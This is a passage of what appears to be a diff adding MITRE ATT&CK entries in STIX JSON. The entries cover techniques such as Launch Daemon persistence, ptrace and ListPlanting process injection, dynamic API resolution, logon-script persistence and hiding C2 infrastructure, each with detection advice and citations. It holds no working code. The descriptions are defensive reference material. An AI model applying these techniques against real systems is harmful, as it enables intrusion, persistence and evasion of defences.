/Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n \nAdversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.\n \nThe plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1160", + "external_id": "T1160" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "OSX Malware Detection", + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", + "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "created": "2020-01-14T01:33:19.065Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/008", + "external_id": "T1055.008" + }, + { + "source_name": "PTRACE man", + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html" + }, + { + "source_name": "Medium Ptrace JUL 2018", + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", + "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + }, + { + "source_name": "BH Linux Inject", + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + }, + { + "source_name": "ArtOfMemoryForensics", + "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017." + }, + { + "source_name": "GNU Acct", + "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", + "url": "https://www.gnu.org/software/acct/" + }, + { + "source_name": "RHEL auditd", + "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + }, + { + "source_name": "Chokepoint preload rootkits", + "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", + "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-30T21:28:45.038Z", + "name": "Power Settings", + "description": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)\n\nAdversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)\n\nFor example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android Users) Adversaries may also extend system lock screen timeout settings.(Citation: BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware Loader Campaign)\n\nAware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Goldstein Menachem", + "Juan Tapiador" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line invocation of tools capable of modifying services may be unusual and can be monitored for and alerted on, depending on how systems are typically used in a particular environment. \n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "created": "2023-06-05T15:52:52.467Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1653", + "external_id": "T1653" + }, + { + "source_name": "Sleep, shut down, hibernate", + "description": "AVG. (n.d.). Should You Shut Down, Sleep or Hibernate Your PC or Mac Laptop?. Retrieved June 8, 2023.", + "url": "https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop" + }, + { + "source_name": "CoinLoader: A Sophisticated Malware Loader Campaign", + "description": "Avira. (2019, November 28). CoinLoader: A Sophisticated Malware Loader Campaign. Retrieved June 5, 2023.", + "url": "https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign" + }, + { + "source_name": "BATLOADER: The Evasive Downloader Malware", + "description": "Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht. (2022, November 14). BATLOADER: The Evasive Downloader Malware. Retrieved June 5, 2023.", + "url": "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html" + }, + { + "source_name": "Two New Monero Malware Attacks Target Windows and Android Users", + "description": "Douglas Bonderud. (2018, September 17). Two New Monero Malware Attacks Target Windows and Android Users. Retrieved June 5, 2023.", + "url": "https://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-users/" + }, + { + "source_name": "Condi-Botnet-binaries", + "description": "Joie Salvio and Roy Tay. (2023, June 20). Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389. Retrieved September 5, 2023.", + "url": "https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389" + }, + { + "source_name": "systemdsleep Linux", + "description": "Man7. (n.d.). systemd-sleep.conf(5) — Linux manual page. Retrieved June 7, 2023.", + "url": "https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html" + }, + { + "source_name": "Microsoft: Powercfg command-line options", + "description": "Microsoft. (2021, December 15). Powercfg command-line options. Retrieved June 5, 2023.", + "url": "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options?adlt=strict" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-29T14:04:50.569Z", + "name": "Network Connection Enumeration", + "description": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Script: Script Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0840", + "external_id": "T0840" + }, + { + "source_name": "MITRE", + "description": "MITRE System Network Connections Discovery Retrieved. 2018/05/31 ", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "source_name": "Netstat", + "description": "Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.", + "url": "https://en.wikipedia.org/wiki/Netstat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Dynamic API Resolution", + "description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\n\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)\n\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\n\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", + "created": "2022-08-22T20:42:08.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/007", + "external_id": "T1027.007" + }, + { + "source_name": "Huntress API Hash", + "description": "Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.", + "url": "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection" + }, + { + "source_name": "BlackHat API Packers", + "description": "Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf" + }, + { + "source_name": "Drakonia HInvoke", + "description": "drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.", + "url": "https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03" + }, + { + "source_name": "IRED API Hashing", + "description": "spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.", + "url": "https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:13.327Z", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)\n\nIn control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Share: Network Share Access", + "File: File Metadata", + "File: File Creation", + "Network Traffic: Network Traffic Content", + "Command: Command Execution", + "Process: Process Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0867", + "external_id": "T0867" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Lateral Tool Transfer Retrieved. 2019/10/27 Lateral Tool Transfer Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1570/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-07T14:23:30.265Z", + "name": "Remote Desktop Protocol", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "RDP service enabled, account in the Remote Desktop Users group" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "created": "2020-02-11T18:23:26.059Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/001", + "external_id": "T1021.001" + }, + { + "source_name": "Alperovitch Malware", + "description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.", + "url": "http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/" + }, + { + "source_name": "TechNet Remote Desktop Services", + "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", + "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Logon Script (Windows)", + "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "created": "2020-01-10T03:43:37.211Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037/001", + "external_id": "T1037.001" + }, + { + "source_name": "TechNet Logon Scripts", + "description": "Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx" + }, + { + "source_name": "Hexacorn Logon Scripts", + "description": "Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part 18. Retrieved November 15, 2019.", + "url": "http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "ListPlanting", + "description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\n\nList-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.\n\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.\n\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) \n\nFinally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as FindWindow, FindWindowEx, EnumWindows, EnumChildWindows, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be abused for this technique. \n\nConsider monitoring for excessive use of SendMessage and/or PostMessage API functions with LVM_SETITEMPOSITION and/or LVM_GETITEMPOSITION arguments.\n\nAnalyze process behavior to determine if a process is performing unusual actions, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "created": "2021-11-22T15:02:15.190Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/015", + "external_id": "T1055.015" + }, + { + "source_name": "Microsoft List View Controls", + "description": "Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.", + "url": "https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview" + }, + { + "source_name": "Modexp Windows Process Injection", + "description": "odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.", + "url": "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-18T19:44:00.603Z", + "name": "Hide Infrastructure", + "description": "Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.\n\nC2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)\n\nAdversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)\n\nHiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Mullins", + "Eliav Livneh", + "Hen Porcilan", + "Diyar Saadi Ali" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux", + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "created": "2024-02-13T17:00:00.175Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1665", + "external_id": "T1665" + }, + { + "source_name": "SocGholish-update", + "description": "Andrew Northern. (2022, November 22). SocGholish, a very real threat from a very fake update. Retrieved 